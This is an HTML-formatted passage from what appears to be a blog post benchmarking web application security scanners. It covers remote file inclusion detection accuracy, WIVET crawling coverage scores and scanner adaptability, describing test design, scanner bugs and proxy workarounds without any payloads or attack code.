&lt;b&gt;&lt;span style=&quot;font-size: 18pt; line-height: 115%;&quot;&gt;11. &lt;/span&gt;&lt;/b&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;b&gt;&lt;u&gt;&lt;span style=&quot;font-size: 18pt; line-height: 115%;&quot;&gt;Test VI – The Detection Accuracy of RFI
(XSS via RFI)&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;b&gt;&lt;u&gt;&lt;span style=&quot;font-size: 18pt; line-height: 115%;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
The sixth assessment criterion was the detection accuracy of
Remote File Inclusion (or more accurately, vectors of RFI that can result in
XSS or Phishing - and currently, not necessarily in server code execution), a
newly implemented feature in WAVSEP v1.2, and the one of most commonly
implemented attack vector in web application scanners. &lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
I didn&#39;t originally plan to assess the detection accuracy of
RFI in this benchmark, however, since I implemented a new structure to wavsep
that enables me to write &lt;b&gt;a lot&lt;/b&gt; of test cases faster, I couldn&#39;t resist
the urge to try it... and thus, found a new way to decrease the amount of sleep
I get each night. &lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
The interesting thing I found was that although RFI is
supposed to work a bit differently than LFI/Path traversal, many LFI/Path
traversal Plugins effectively detected RFI exposures, and in some instances,
the tests for both of these vulnerabilities were actually implemented in the
same plugin (usually named &quot;file inclusions&quot;); thus, while scanning
for Traversal/LFI/RFI, I usually activated all the relevant plugins in the
scanner, and low and behold - got results from the LFI/Path Traversal plugins
that even the RFI dedicated plugins did not detect. &lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
In order to assess the detection accuracy of different remote
file inclusion exposures (again, RXSS/Phishing via RFI vectors), I designed a
total of &lt;b&gt;108&lt;/b&gt; remote file inclusion&lt;b&gt; &lt;/b&gt;test cases.&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
The tests were deigned to emulate various combination of the
following conditions and restrictions:&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgnTnzv8dJryVT5T347dAlrTc6EkQhT0oiMbPhA1w2JI_5Dntngi2DiJ3eKYOHo_Sm_yhAvCMzM-2hnyGBGyYACfOzOdIa8jEoEy7YM3-4AwDQuaoHN7teAqWYJ0p6laU55EV3UZ-w4HJg/s1600/Remote+File+Inclusion+Tests.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;480&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgnTnzv8dJryVT5T347dAlrTc6EkQhT0oiMbPhA1w2JI_5Dntngi2DiJ3eKYOHo_Sm_yhAvCMzM-2hnyGBGyYACfOzOdIa8jEoEy7YM3-4AwDQuaoHN7teAqWYJ0p6laU55EV3UZ-w4HJg/s640/Remote+File+Inclusion+Tests.png&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
Just like the case of path traversal, In reality, there were
supposed to be more XSS via RFI test cases, primarily because I intended to
test injection entry points in which the input only affected the filename
without the extension, or was injected directly into the directory name.
However, due to the sheer amount of tests and the deadline I had for this
benchmark, I decided to delete (literally) the test cases that handled these
anomalies, and focus on test cases in which the entire filename/path was
affected. That being said, I might publish these test cases in future versions
of wavsep (they amount to dozens).&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;b&gt;&lt;i&gt;[Note: Although the tested versions of Appscan and Nessus
contain RFI detection plugins, they did not support the detection of XSS via
RFI.]&lt;o:p&gt;&lt;/o:p&gt;&lt;/i&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;b&gt;&lt;i&gt;&lt;br /&gt;&lt;/i&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
The comparison of the scanners&#39; remote file inclusion detection accuracy is documented in detail in the following section of sectoolmarket:&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;a href=&quot;http://sectoolmarket.com/remote-file-inclusion-detection-accuracy-unified-list.html&quot;&gt;http://sectoolmarket.com/remote-file-inclusion-detection-accuracy-unified-list.html&lt;/a&gt;
&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;b&gt;&lt;u&gt;Result Chart Glossary&lt;o:p&gt;&lt;/o:p&gt;&lt;/u&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
Note that the&amp;nbsp;&lt;b&gt;&lt;span style=&quot;color: #38761d;&quot;&gt;GREEN&lt;/span&gt;&lt;span style=&quot;color: #0070c0;&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;/b&gt;bar represents the vulnerable test case detection accuracy, while the&amp;nbsp;&lt;b&gt;&lt;span style=&quot;color: red;&quot;&gt;RED&lt;/span&gt;&amp;nbsp;&lt;/b&gt;bar represents false positive&amp;nbsp;&lt;u&gt;categories&lt;/u&gt;&amp;nbsp;detected by the tool (which may result in more instances then what the bar actually presents, when compared to the detection accuracy bar).&lt;/div&gt;
&lt;br /&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;b&gt;&lt;u&gt;The RFI (XSS via RFI) Detection Accuracy of Web
Application Scanners – Commercial Tools&lt;o:p&gt;&lt;/o:p&gt;&lt;/u&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;b&gt;&lt;u&gt;&lt;br /&gt;&lt;/u&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjOOeORYtoeap_eMq3fr7l6SEYbDtzL-XbQN79miOK4Us4B4K34wx_0Y2z7_9XIhOo-WdbDNXQNF5pmXF2kl7nSYpb727cHdY2PZSnKj7clh9StBZv3pRkv1_1yWcperNParq4n7gj7nSQ/s1600/rfi-score-commercial.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;116&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjOOeORYtoeap_eMq3fr7l6SEYbDtzL-XbQN79miOK4Us4B4K34wx_0Y2z7_9XIhOo-WdbDNXQNF5pmXF2kl7nSYpb727cHdY2PZSnKj7clh9StBZv3pRkv1_1yWcperNParq4n7gj7nSQ/s640/rfi-score-commercial.png&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;b&gt;&lt;u&gt;&lt;br /&gt;&lt;/u&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;b&gt;&lt;u&gt;&lt;br /&gt;&lt;/u&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;b&gt;&lt;u&gt;The RFI (XSS via RFI) Detection Accuracy of Web
Application Scanners – Open Source &amp;amp; Free Tools&lt;o:p&gt;&lt;/o:p&gt;&lt;/u&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;b&gt;&lt;u&gt;&lt;br /&gt;&lt;/u&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhwKvKm705dBWlCMDuQGzHFJFp5Y9J4vdX3FI6F1tmAFzxLv2sxgMs9-W1iZItRP6b4mjRvm7nlPIU7XmLV7nevCJuepJPz3fuQTm1QARWMUa6aauX8gXy52ob3wpVdedC3cuJaj5KYYJE/s1600/rfi-score-opensource.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;180&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhwKvKm705dBWlCMDuQGzHFJFp5Y9J4vdX3FI6F1tmAFzxLv2sxgMs9-W1iZItRP6b4mjRvm7nlPIU7XmLV7nevCJuepJPz3fuQTm1QARWMUa6aauX8gXy52ob3wpVdedC3cuJaj5KYYJE/s640/rfi-score-opensource.png&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;b&gt;&lt;u&gt;&lt;br /&gt;&lt;/u&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;b&gt;&lt;u&gt;The RFI (XSS via RFI) Detection Accuracy of Web
Application Scanners – Unified List&lt;o:p&gt;&lt;/o:p&gt;&lt;/u&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiQhymkyF3_HaSt74De4UoXsnKN5WoXKUJ8vrLgZd_GeFmmt_3zNLKHkpVgLui_9-fEWlIbArr5RE4w2zpDwTWKEfomZv-BxsLRcCh5BZu3KylDwHfSczwV-fhSUxbpvl3iO4YioVB4xvc/s1600/rfi-score-unified.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;190&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiQhymkyF3_HaSt74De4UoXsnKN5WoXKUJ8vrLgZd_GeFmmt_3zNLKHkpVgLui_9-fEWlIbArr5RE4w2zpDwTWKEfomZv-BxsLRcCh5BZu3KylDwHfSczwV-fhSUxbpvl3iO4YioVB4xvc/s640/rfi-score-unified.png&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
And after covering all those accuracy aspects, it&#39;s time to
cover a totally different subject - Coverge.&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoListParagraph&quot; style=&quot;margin-left: 18.0pt; mso-add-space: auto; mso-list: l11 level1 lfo7; mso-outline-level: 1; text-indent: -18.0pt;&quot;&gt;
&lt;b&gt;&lt;span style=&quot;font-size: 18pt; line-height: 115%;&quot;&gt;12. &lt;/span&gt;&lt;/b&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;b&gt;&lt;u&gt;&lt;span style=&quot;font-size: 18pt; line-height: 115%;&quot;&gt;Test VII - WIVET - Coverage via
Automated Crawling&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;b&gt;&lt;u&gt;&lt;span style=&quot;font-size: 18pt; line-height: 115%;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
The seventh assessment criterion was the scanner&#39;s WIVET
score, which is related to coverage.&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
The concept of coverage can mean a lot of things, but in
general, what I&#39;m referring to is the ability of the scanner to increase the
attack surface of the tested application - to locate additional resources and
input delivery methods to attack. &lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
Although a scanner can increase the attack surface in a
number of ways, from detecting hidden files to exposing device-specific
interfaces, this section of the benchmark focuses on &lt;b&gt;automated crawling&lt;/b&gt;
and an efficient &lt;b&gt;input vector extraction&lt;/b&gt;.&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
This aspect of a scanner is extremely important in
point-and-shoot scans, scans in which the user does not &quot;train&quot; the
scanner to recognize the application structure, URLs and requests, either due
to time/methodology restrictions, or when the user is not a security expert
that knows how to properly use manual crawling with the scanner. &lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
In order to evaluate these aspects in scanners, I used a
wonderful OWASP turkey project called &lt;a href=&quot;http://code.google.com/p/wivet/&quot;&gt;&lt;b&gt;WIVET&lt;/b&gt;&lt;/a&gt;
(Web Input Vector Extractor Teaser); The WIVET project is a benchmarking
project that was written by an application security specialist by the name of &lt;a href=&quot;http://twitter.com/bedirhanurgun/&quot;&gt;Bedirhan Urgun&lt;/a&gt;, and released under
the GPL2 license. &lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
The project is implemented as a web application which aims to &quot;statistically analyze web link extractors&quot;, by measuring the amount of input vectors extracted by each scanner while crawling the WIVET website, in order to assess how well each scanner can increase the coverage of the attack surface.&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;span style=&quot;background-color: black; color: white;&quot;&gt;Plainly speaking, the project simply measures how well a
scanner is able to crawl the application, and how well can it locate input
vectors, by presenting a collection of challenges that contain links,
parameters and input delivery methods that the crawling process should locate
and extract.&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
Although WIVET used to have an online instance, with my
luck, by the time I decided to use it the online version was already gone... so
I checked-out the latest subversion revision from the project&#39;s google code
website (v3-revision148), installed FastCGI on an IIS server (Windows XP),
copied the application files to a directory called &lt;b&gt;wivet&lt;/b&gt; under the &lt;b&gt;C:\Inetpub\wwwroot\&lt;/b&gt;
directory, and started the IIS default website.&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
In order for WIVET to work, the scanner must crawl the
application while consistently using the same session identifier in its
crawling requests, while avoiding the 100.php logout page (which initializes
the session, and thus the results). The results can then be viewed by accessing
the application index page, while using the session identifier used during the
scan.&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
A very nice idea that makes the assessment process easy and
effective, however, for me, things weren&#39;t that easy. Although some scanners
did work properly with the platform, many scanners did not receive any score,
even though I configured them exactly according to the recommendations (valid
session identifier and logout URL exclusion), so after a careful examination, I
discovered the source of my problem: some of the scanners don&#39;t send the
predefined session identifier in their crawling requests (even though it&#39;s
explicitly defined in the product), and others simply ignore URL exclusions (in
certain conditions).&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
Since even without these bugs, not all the scanners
supported URL exclusions (100.php logout page) and predefined cookies, I had to
come up with a solution that will enable me to test all of them... so I changed
the WIVET platform a little bit by deleting the link to the logout page
(100.php) from the main menu page (menu.php), forwarded the communication of
the vast majority of scanners through a fiddler instance, in which I defined a
valid WIVET session identifier (using the &lt;b&gt;filter&lt;/b&gt; features), and in
extreme scenarios in which an upstream proxy was not supported by the scanner,
defined the WIVET website as a &lt;b&gt;proxy&lt;/b&gt; in an IE browser, loaded fiddler
(so it will forward the communication to the system defined proxy - WIVET),
defined burp as a transparent proxy that forwards the communication to fiddler
(upstream proxy), and scanned burp instead of the WIVET application (the
scanner will scan burp which will forward the communication to fiddler which
will forward the communication to the system defined proxy - the WIVET
website).&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
These solutions seemed to be working for most vendors, that
is until I discovered two more bugs that caused these solutions not to work for
another small group of products...&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
The first bug was related to the emulation of modern browser
behavior when interpreting the &lt;b&gt;relative context&lt;/b&gt; of links in a frameset
(browsers use the link&#39;s target frame as the path basis, but some scanners used
the path basis of the links origin page), and the other bug was related to
another browser emulation issue - some scanners that did not manage to submit
forms without an action property (while a browser usually submits such a form
to the same URL that form originated from).&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
I managed to solve the first bug by editing the menu page&lt;b&gt;
&lt;/b&gt;and&lt;b&gt; manually&lt;/b&gt; &lt;b&gt;adding&lt;/b&gt; additional links with an alternate
context&amp;nbsp; (added &quot;pages/&quot; to all
URLs) to the same WIVET pages , while the second bug was reported to some
vendors (and was handled by them).&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
Finally, some of the scanners had bugs that I did not manage
to isolate in the given timeframe, and thus, I didn&#39;t manage to get any WIVET
score for them (a list of these products will presented at the end of this
section).&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
However, the vast majority of the scanners did got a score,
which can be viewed in the following charts and links.&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
The comparison of the scanners&#39; WIVET score is documented in detail in the following section of sectoolmarket:&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;a href=&quot;http://sectoolmarket.com/wivet-score-unified-list.html&quot;&gt;http://sectoolmarket.com/wivet-score-unified-list.html&lt;/a&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;u&gt;The WIVET Score of Web Application Scanners – Commercial Tools&lt;/u&gt;&lt;/b&gt;
&lt;/div&gt;
&lt;br /&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjjgGCZAy9dhhphtB4oqQMOiLDbO4Zo9wzC7ICUIHl8wjJ20qzpaOtIl_E9cWBDLVpxEseVP-_079ugEXawObzSmlsDu8gR-1xr5geIWfGPhbXP8J_SYiX_TCgAAbJpfNFibyYccTHdEK4/s1600/wivet-score-commercial.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;188&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjjgGCZAy9dhhphtB4oqQMOiLDbO4Zo9wzC7ICUIHl8wjJ20qzpaOtIl_E9cWBDLVpxEseVP-_079ugEXawObzSmlsDu8gR-1xr5geIWfGPhbXP8J_SYiX_TCgAAbJpfNFibyYccTHdEK4/s640/wivet-score-commercial.png&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;
&lt;b style=&quot;text-align: -webkit-auto;&quot;&gt;&lt;u&gt;The WIVET Score of Web Application Scanners – Free and Open Source Tools&lt;/u&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi3mEAUoVfJoTr7u9q1J_oFH_nB_TiD85ub7LkJ1ud-eWGWePB9f16PXLMxDUzlwMjE9ThpEMsmQTDdl-n37_BPezZtNfla7cdaNIPX9NIZfSpGmiSo4w9uh8Ot-C4Ph9lpv4pDkH2ovyY/s1600/wivet-score-opensource.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;222&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi3mEAUoVfJoTr7u9q1J_oFH_nB_TiD85ub7LkJ1ud-eWGWePB9f16PXLMxDUzlwMjE9ThpEMsmQTDdl-n37_BPezZtNfla7cdaNIPX9NIZfSpGmiSo4w9uh8Ot-C4Ph9lpv4pDkH2ovyY/s640/wivet-score-opensource.png&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;
&lt;b style=&quot;text-align: -webkit-auto;&quot;&gt;&lt;u&gt;The WIVET Score of Web Application Scanners – Unified List&lt;/u&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgWcD5lb8iKJOR0CVPJbyzMne-17oOYGNDx0dT3aa5TXWpSW1D8CFf9X4gqmWEb9IPn652oLuQutNbf5-qHdFO5H2rRoSXpNfieSd0lBUD1NYzqPbVa60iuwlN-IuzzI1yEJ39hmzDFdfc/s1600/wivet-score-unified.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;246&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgWcD5lb8iKJOR0CVPJbyzMne-17oOYGNDx0dT3aa5TXWpSW1D8CFf9X4gqmWEb9IPn652oLuQutNbf5-qHdFO5H2rRoSXpNfieSd0lBUD1NYzqPbVa60iuwlN-IuzzI1yEJ39hmzDFdfc/s640/wivet-score-unified.png&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;
It is important to clarify that due to these scanner bugs (and the current WIVET structure) - low scores and non-existing scores might differ once minor bugs are fixed, but the scores presented in this chart are currently all I can offer.&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
The following scanners didn&#39;t manage to get a WIVET score at
all (even after all the adjustments and enhancements I tried), and although
this does not mean that their score is necessarily low, or that there isn&#39;t any
possible way to execute them in-front of WIVET, simply that there isn&#39;t &lt;b&gt;a
simple&lt;/b&gt; method of doing it (at least not one that I discovered):&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
Syhunt Mini (Sandcat Mini), Webcruiser, IronWASP, Safe3WVS
free edition, N-Stalker 2012 free edition, Vega, Skipfish.&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
In addition, I didn&#39;t try scanning WIVET with various
unmaintained scanners, scanners that didn&#39;t have a spider feature (WATOBO in
the assessed version, Ammonite, etc), or with the following assessed tools: Nessus,
sqlmap.&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
It&#39;s crucial to note that scanners with burp-log parsing
features (such sqlmap and IronWASP) can effectively be assigned with the WIVET
score of burp, that scanners with internal proxy features (such as ZAP,
Burpsuite, Vega, etc) can be used with the crawling mechanisms of other
scanners (such as Acunetix FE), and that as a result of &lt;b&gt;both&lt;/b&gt; of these conclusions,
any scanner that supports any of those features can be assigned the WIVET score
of any scanner in the possession of the tester (by using the crawling mechanism
of a scanner through a proxy such as burp, in order to generate scan logs).&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoListParagraph&quot; style=&quot;margin-left: 18.0pt; mso-add-space: auto; mso-list: l11 level1 lfo7; mso-outline-level: 1; text-indent: -18.0pt;&quot;&gt;
&lt;b&gt;&lt;span style=&quot;font-size: 18pt; line-height: 115%;&quot;&gt;13. &lt;/span&gt;&lt;/b&gt;&lt;span dir=&quot;LTR&quot;&gt;&lt;/span&gt;&lt;b&gt;&lt;u&gt;&lt;span style=&quot;font-size: 18pt; line-height: 115%;&quot;&gt;Test VIII – Scanner Adaptability - Crawling
&amp;amp; Scan Barriers&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;b&gt;&lt;u&gt;&lt;span style=&quot;font-size: 18pt; line-height: 115%;&quot;&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
By using the seemingly irrelevant term &quot;adaptability&quot;
in relation to scanners, I&#39;m actually referring to the scanner&#39;s ability to
adapt and scan the application, despite different technologies, abnormal crawling
requirements and &lt;b&gt;varying&lt;/b&gt; scan barriers, such as Anti-CSRF tokens,
CAPTCHA mechanisms, platform specific tokens (such as required viewstate
values) or account lock mechanisms.&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
Although not necessarily a measurable quality, the ability
of the scanner to handle different technologies and scan barriers is an
important perquisite, and in a sense, almost as important as being able to scan
the input delivery method.&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;b&gt;Reasoning&lt;/b&gt;: An automated tool can&#39;t detect a
vulnerability in a point and shoot scenario if it is can&#39;t locate &amp;amp; scan the
vulnerable location due to the lack of support in a certain a browser add-on, the
lack of support for extracting data from certain non-standard vectors, or the
lack of support in overcoming a specific barrier, such as a required token or
challenge. The more barriers the scanner is able to handle, the more useful it
is when scanning complex applications that employ the use of various
technologies and scan barriers (assuming it can handle the relevant input
vectors, supports the necessary features such as authentication, or has a
feature that can be used to work around the specific limitations). &lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
The following charts shows how many types of barriers does
each scanner claim to be able to handle (these features were not verified, and the
information currently relies on documentation or vendor supplied information):&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;&lt;u&gt;The Adaptability Score of Web Application Scanners – Commercial Tools&lt;/u&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
